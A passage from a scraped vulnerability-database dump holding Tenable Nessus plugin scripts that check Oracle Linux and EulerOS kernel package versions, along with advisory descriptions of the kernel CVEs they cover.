script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11190\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-5327\", \"CVE-2017-18360\", \"CVE-2018-19985\", \"CVE-2019-11190\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2019-4642\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-124.27.1.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-124.27.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-01-07T08:56:52", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - In the Linux kernel through 4.14.13, the\n rds_message_alloc_sgs() function does not validate a\n value that is used during DMA page allocation, leading\n to a heap-based out-of-bounds write (related to the\n rds_rdma_extra_size() function in 'net/rds/rdma.c') and\n thus to a system panic. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2018-5332)\n\n - In the Linux kernel through 4.14.13, the\n rds_cmsg_atomic() function in 'net/rds/rdma.c'\n mishandles cases where page pinning fails or an invalid\n address is supplied by a user. This can lead to a NULL\n pointer dereference in rds_atomic_free_op() and thus to\n a system panic.(CVE-2018-5333)\n\n - A flaw was found in the Linux kernel's handling of\n loopback devices. An attacker, who has permissions to\n setup loopback disks, may create a denial of service or\n other unspecified actions.(CVE-2018-5344)\n\n - The acpi_smbus_hc_add function in drivers/acpi/sbshc.c\n in the Linux kernel, through 4.14.15, allows local\n users to obtain sensitive address information by\n reading dmesg data from an SBS HC printk\n call.(CVE-2018-5750)\n\n - The futex_requeue function in kernel/futex.c in the\n Linux kernel, before 4.14.15, might allow attackers to\n cause a denial of service (integer overflow) or\n possibly have unspecified other impacts by triggering a\n negative wake or requeue value. Due to the nature of\n the flaw, privilege escalation cannot be fully ruled\n out, although we believe it is unlikely.(CVE-2018-6927)\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757)\n\n - A an integer overflow vulnerability was discovered in\n the Linux kernel, from version 3.4 through 4.15, in the\n drivers/gpu/drm/udl/udl_fb.c:udl_fb_mmap() function. An\n attacker with access to the udldrmfb driver could\n exploit this to obtain full read and write permissions\n on kernel physical pages, resulting in a code execution\n in kernel space.(CVE-2018-8781)\n\n - A flaw was found in the way the Linux KVM module\n processed the trap flag(TF) bit in EFLAGS during\n emulation of the syscall instruction, which leads to a\n debug exception(#DB) being raised in the guest stack. A\n user/process inside a guest could use this flaw to\n potentially escalate their privileges inside the guest.\n Linux guests are not affected by this.(CVE-2017-7518)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.(CVE-2016-10741)\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and reused. This is\n fixed in the following kernel versions: 4.9.135,\n 4.14.78, 4.18.16, 4.19.(CVE-2018-18281)\n\n - An issue was discovered in the proc_pid_stack function\n in fs/proc/base.c in the Linux kernel. An attacker with\n a local account can trick the stack unwinder code to\n leak stack contents to userspace. The fix allows only\n root to inspect the kernel stack of an arbitrary\n task.(CVE-2018-17972)\n\n - An issue was discovered in can_can_gw_rcv in\n net/can/gw.c in the Linux kernel through 4.19.13. The\n CAN frame modification rules allow bitwise logical\n operations that can be also applied to the can_dlc\n field. Because of a missing check, the CAN drivers may\n write arbitrary content beyond the data registers in\n the CAN controller's I/O memory when processing can-gw\n manipulated outgoing frames. This is related to\n cgw_csum_xor_rel. An unprivileged user can trigger a\n system crash (general protection fault).(CVE-2019-3701)\n\n - A flaw was found In the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.(CVE-2018-19824)\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862)\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.(CVE-2018-18559)\n\n - A new software page cache side channel attack scenario\n was discovered in operating systems that implement the\n very common 'page cache' caching mechanism. A malicious\n user/process could use 'in memory' page-cache knowledge\n to infer access timings to shared memory and gain\n knowledge which can be used to reduce effectiveness of\n cryptographic strength by monitoring algorithmic\n behavior, infer access patterns of memory to determine\n code paths taken, and exfiltrate data to a blinded\n attacker through page-granularity access times as a\n side-channel.(CVE-2019-5489)\n\n - A flaw was found in mmap in the Linux kernel allowing\n the process to map a null page. This allows attackers\n to abuse this mechanism to turn null pointer\n dereferences into workable exploits.(CVE-2019-9213)\n\n - A flaw named FragmentSmack was found in the way the\n Linux kernel handled reassembly of fragmented IPv4 and\n IPv6 packets. A remote attacker could use this flaw to\n trigger time and calculation expensive fragment\n reassembly algorithm by sending specially crafted\n packets which could lead to a CPU saturation and hence\n a denial of service on the system.(CVE-2018-5391)\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1512)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5333", "CVE-2018-19824", "CVE-2017-7518", "CVE-2016-10741", "CVE-2018-5344", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-16862", "CVE-2018-8781", "CVE-2018-5391", "CVE-2018-18710", "CVE-2018-18281", "CVE-2018-5332", "CVE-2018-18559", "CVE-2019-3701", "CVE-2018-17972", "CVE-2017-18360", "CVE-2019-9213", "CVE-2018-5750", "CVE-2019-5489"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1512.NASL", "href": "https://www.tenable.com/plugins/nessus/124834", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124834);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-10741\",\n \"CVE-2017-18360\",\n \"CVE-2017-7518\",\n \"CVE-2018-16862\",\n \"CVE-2018-17972\",\n \"CVE-2018-18281\",\n \"CVE-2018-18559\",\n \"CVE-2018-18710\",\n \"CVE-2018-19824\",\n \"CVE-2018-5332\",\n \"CVE-2018-5333\",\n \"CVE-2018-5344\",\n \"CVE-2018-5391\",\n \"CVE-2018-5750\",\n \"CVE-2018-6927\",\n \"CVE-2018-7757\",\n \"CVE-2018-8781\",\n \"CVE-2019-3701\",\n \"CVE-2019-5489\",\n \"CVE-2019-9213\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1512)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - In the Linux kernel through 4.14.13, the\n rds_message_alloc_sgs() function does not validate a\n value that is used during DMA page allocation, leading\n to a heap-based out-of-bounds write (related to the\n rds_rdma_extra_size() function in 'net/rds/rdma.c') and\n thus to a system panic. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2018-5332)\n\n - In the Linux kernel through 4.14.13, the\n rds_cmsg_atomic() function in 'net/rds/rdma.c'\n mishandles cases where page pinning fails or an invalid\n address is supplied by a user. This can lead to a NULL\n pointer dereference in rds_atomic_free_op() and thus to\n a system panic.(CVE-2018-5333)\n\n - A flaw was found in the Linux kernel's handling of\n loopback devices. An attacker, who has permissions to\n setup loopback disks, may create a denial of service or\n other unspecified actions.(CVE-2018-5344)\n\n - The acpi_smbus_hc_add function in drivers/acpi/sbshc.c\n in the Linux kernel, through 4.14.15, allows local\n users to obtain sensitive address information by\n reading dmesg data from an SBS HC printk\n call.(CVE-2018-5750)\n\n - The futex_requeue function in kernel/futex.c in the\n Linux kernel, before 4.14.15, might allow attackers to\n cause a denial of service (integer overflow) or\n possibly have unspecified other impacts by triggering a\n negative wake or requeue value. Due to the nature of\n the flaw, privilege escalation cannot be fully ruled\n out, although we believe it is unlikely.(CVE-2018-6927)\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757)\n\n - A an integer overflow vulnerability was discovered in\n the Linux kernel, from version 3.4 through 4.15, in the\n drivers/gpu/drm/udl/udl_fb.c:udl_fb_mmap() function. An\n attacker with access to the udldrmfb driver could\n exploit this to obtain full read and write permissions\n on kernel physical pages, resulting in a code execution\n in kernel space.(CVE-2018-8781)\n\n - A flaw was found in the way the Linux KVM module\n processed the trap flag(TF) bit in EFLAGS during\n emulation of the syscall instruction, which leads to a\n debug exception(#DB) being raised in the guest stack. A\n user/process inside a guest could use this flaw to\n potentially escalate their privileges inside the guest.\n Linux guests are not affected by this.(CVE-2017-7518)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.(CVE-2016-10741)\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and reused. This is\n fixed in the following kernel versions: 4.9.135,\n 4.14.78, 4.18.16, 4.19.(CVE-2018-18281)\n\n - An issue was discovered in the proc_pid_stack function\n in fs/proc/base.c in the Linux kernel. An attacker with\n a local account can trick the stack unwinder code to\n leak stack contents to userspace. The fix allows only\n root to inspect the kernel stack of an arbitrary\n task.(CVE-2018-17972)\n\n - An issue was discovered in can_can_gw_rcv in\n net/can/gw.c in the Linux kernel through 4.19.13. The\n CAN frame modification rules allow bitwise logical\n operations that can be also applied to the can_dlc\n field. Because of a missing check, the CAN drivers may\n write arbitrary content beyond the data registers in\n the CAN controller's I/O memory when processing can-gw\n manipulated outgoing frames. This is related to\n cgw_csum_xor_rel. An unprivileged user can trigger a\n system crash (general protection fault).(CVE-2019-3701)\n\n - A flaw was found In the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.(CVE-2018-19824)\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862)\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.(CVE-2018-18559)\n\n - A new software page cache side channel attack scenario\n was discovered in operating systems that implement the\n very common 'page cache' caching mechanism. A malicious\n user/process could use 'in memory' page-cache knowledge\n to infer access timings to shared memory and gain\n knowledge which can be used to reduce effectiveness of\n cryptographic strength by monitoring algorithmic\n behavior, infer access patterns of memory to determine\n code paths taken, and exfiltrate data to a blinded\n attacker through page-granularity access times as a\n side-channel.(CVE-2019-5489)\n\n - A flaw was found in mmap in the Linux kernel allowing\n the process to map a null page. This allows attackers\n to abuse this mechanism to turn null pointer\n dereferences into workable exploits.(CVE-2019-9213)\n\n - A flaw named FragmentSmack was found in the way the\n Linux kernel handled reassembly of fragmented IPv4 and\n IPv6 packets. A remote attacker could use this flaw to\n trigger time and calculation expensive fragment\n reassembly algorithm by sending specially crafted\n packets which could lead to a CPU saturation and hence\n a denial of service on the system.(CVE-2018-5391)\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1512\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e89fa9cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8781\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:55:52", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/hid/hid-zpff.c in the Human Interface Device\n (HID) subsystem in the Linux kernel through 3.11, when\n CONFIG_HID_ZEROPLUS is enabled, allows physically\n proximate attackers to cause a denial of service\n (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2889i1/4%0\n\n - The capabilities implementation in the Linux kernel\n before 3.14.8 does not properly consider that\n namespaces are inapplicable to inodes, which allows\n local users to bypass intended chmod restrictions by\n first creating a user namespace, as demonstrated by\n setting the setgid bit on a file with group ownership\n of root.(CVE-2014-4014i1/4%0\n\n - The function drivers/usb/core/config.c in the Linux\n kernel, allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531i1/4%0\n\n - The snd_timer_interrupt function in sound/core/timer.c\n in the Linux kernel before 4.4.1 does not properly\n maintain a certain linked list, which allows local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl\n call.(CVE-2016-2545i1/4%0\n\n - A flaw was found in the Linux kernel where the deletion\n of a file or directory could trigger an unmount and\n reveal data under a mount point. This flaw was\n inadvertently introduced with the new feature of being\n able to lazily unmount a mount tree when using file\n system user namespaces.(CVE-2015-4176i1/4%0\n\n - The do_shmat function in ipc/shm.c in the Linux kernel,\n through 4.9.12, does not restrict the address\n calculated by a certain rounding operation. This allows\n privileged local users to map page zero and,\n consequently, bypass a protection mechanism that exists\n for the mmap system call. This is possible by making\n crafted shmget and shmat system calls in a privileged\n context.(CVE-2017-5669i1/4%0\n\n - In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the\n Linux kernel, before 4.13, local users can cause a\n denial of service (use-after-free and BUG) or possibly\n have unspecified other impact by leveraging differences\n in skb handling between hns_nic_net_xmit_hw and\n hns_nic_net_xmit.(CVE-2017-18218i1/4%0\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155i1/4%0\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2013-7421i1/4%0\n\n - Off-by-one error in the get_prng_bytes function in\n 